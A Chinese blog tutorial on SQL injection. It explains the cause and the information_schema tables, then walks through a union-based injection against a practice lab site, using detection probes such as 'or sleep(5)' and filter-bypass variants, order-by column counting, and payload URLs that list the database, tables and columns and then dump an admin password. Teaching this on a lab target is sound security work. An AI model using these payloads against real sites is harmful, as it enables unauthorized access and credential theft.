526互联

sql注入原理分析

发布时间 2023-09-29 17:32:14作者: 橙子全栈测试笔记

SQL注入的原理与分析

1、SQL注入的本质

2、部分SQL语句

3、SQL注入流程

一、SQL注入的本质

  SQL注入的本质,就是把用户输入的数据当作代码执行

  Web应用程序对用户输入的数据校验处理不严或者根本没有校验,致使用户可以拼接执行SQL命令

  两个必要关键的条件:

  第一,用户能够控制输入

  第二,原本程序要执行的代码拼接了用户输入的数据然后执行

二、部分SQL语句

  · column_name 字段名

  · table_name 表名

  · schema_name 库名

  · information_schema 数据库所有信息,库、表、字段

  · information_schema.columns 所有字段的信息

    table_schema 所在数据库

    table_name 所在表

    column_name 字段的名字

  · information_schema.tables  所有表的信息

    table_schema 所在数据库

    table_name 表的名字

  · information_schema.schemata 所有数据库的信息

    schema_name 数据库的名字

三、SQL注入流程

  SQL注入流程

  · 找与数据库交互的地方

  · 判断是否存在注入点,注入是字符型or数字型

  · 判断当前表的一个字段数,当前所在的库

  · 去系统自带信息库查表名,字段名

  · 查询需要的字段数据

  SQL注入步骤

  1、判断是否存在注入点

  最古老的方法:and 1=1 成立 且 and 1=2 不成立 => 存在sql注入
  最简单的方法:页面后面加单引号,若报错,则存在sql注入
  进阶:如果是数字型传参,可以尝试-1
  and 1=1 and 1=2 被拦截的可能性超高
  可以尝试 and -1 = -1 或者 -1=-2 或者1>0,,,或者直接or sleep(5) 

  2、判断当前表的字段数,库名

  判断字段数(判断显错位):order by 字段序数   =>  这个语法是是排序语法,根据第几个字段排序,例如,该表有2个字段,若是用了 order by 3 则会报错,因为只有两个字段,不可能根据第三个字段排序。字段序数大于字段数则会报错

      举例:

      http://pu2lh35s.ia.aqlab.cn/?id=1  order by 1 (正常)

      http://pu2lh35s.ia.aqlab.cn/?id=1  order by 2   (正常)

      http://pu2lh35s.ia.aqlab.cn/?id=1  order by 3     (异常)

 异常无法获取到数据

 3、union 联合查询

步骤2已经判断出当前页面存在2个字段

union select 1111,22222

输入栏输入:http://pu2lh35s.ia.aqlab.cn/?id=1 and 1=2 union select 11111,2222               #联合查询表字段数,前后必须一致,2222代表着填充位可以随便写。当and 1=2前面的查询不成立时,才会显示后面填充位的查询记录

 4、判断库名

http://pu2lh35s.ia.aqlab.cn/?id=1 and 1=2 union select 11111,database()       #2222换成database() 

 现在我们已经拿到了当前页面库名maoshe

5、通过库名找到对应的表名

union select 1,table_name from information_schema.tables where table_schema='maoshe'

浏览器输入:http://pu2lh35s.ia.aqlab.cn/?id=1 and 1=2  union select 1,table_name from information_schema.tables where table_schema='maoshe'

到这里表名已经找到

浏览器输入:http://pu2lh35s.ia.aqlab.cn/?id=1 and 1=2  union select 1,table_name from information_schema.tables where table_schema='maoshe'  limit 0,1    

结果显示:admin (说明admin是第一个表名)

浏览器输入:http://pu2lh35s.ia.aqlab.cn/?id=1 and 1=2  union select 1,table_name from information_schema.tables where table_schema='maoshe'  limit 1,2

6、通过表名找到列名

union select 1,column_name from information_schema.columns where table_schema='maoshe' and  table_name ='admin'

浏览器输入:http://pu2lh35s.ia.aqlab.cn/?id=1 and 1=2  union select 1,column_name from information_schema.columns where table_schema='maoshe' and  table_name ='admin' limit 0,1

 浏览器输入:http://pu2lh35s.ia.aqlab.cn/?id=1 and 1=2  union select 1,column_name from information_schema.columns where table_schema='maoshe' and  table_name ='admin' limit 1,2

 浏览器输入:http://pu2lh35s.ia.aqlab.cn/?id=1 and 1=2  union select 1,column_name from information_schema.columns where table_schema='maoshe' and  table_name ='admin' limit 2,3

 依次显示表名对应的列名信息

 http://pu2lh35s.ia.aqlab.cn/?id=1 and 1=2  union select 1,group_concat(column_name) from information_schema.columns where table_schema='maoshe' and  table_name ='admin' 

 显示所有列名信息:

 通过以上步骤知道表名和列名,我们可以直接拿到admin密码

union select 1,password from admin 

  http://pu2lh35s.ia.aqlab.cn/?id=1 and 1=2  union select 1,password from admin 

 密码就是hellhack,到此这个靶场破解成功

 

 

 参考链接:

http://pu2lh35s.ia.aqlab.cn/?id=1 and 1=2  union select 1,database()

http://www.jsons.cn/urlencode/

https://www.cnblogs.com/yyy413/p/15614044.html